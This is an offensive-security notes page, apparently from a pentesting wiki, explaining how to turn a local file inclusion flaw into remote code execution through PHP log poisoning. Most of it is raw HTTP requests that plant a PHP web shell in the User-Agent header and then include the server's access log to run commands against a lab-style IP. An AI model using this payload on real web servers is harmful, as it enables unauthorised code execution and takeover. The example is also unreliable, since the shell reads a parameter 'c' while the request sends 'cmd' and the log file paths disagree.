LFI X Log Poisoning

prerequisites

LFI

explanation

if web application is vulnerable to LFI vulnerability then we can also head towards log poisoning Log poisoning can lead a LFI to RCE By default some applications like (php) makes logs of the user's who visited the website by using the "User-agent" header

in php application logs are stored under >>

/var/log/http-access.log
/var/log/httpd-error.log

in order to exploit it , we need to inject a command injection in USER-AGENT header :-

GET / HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_GET['c']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

After that we can simply call our function using the LFI :-

GET /browse.php?file=/var/log/httpd-access.log&cmd=whoami HTTP/1.1
Host: 10.10.10.84
User-Agent: 0xdf: <?php system($_GET['c']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

PreviousLFI (path traversal)Nextcommand injection

Last updated 1 year ago

hashtagprerequisites

hashtagexplanation

prerequisites

explanation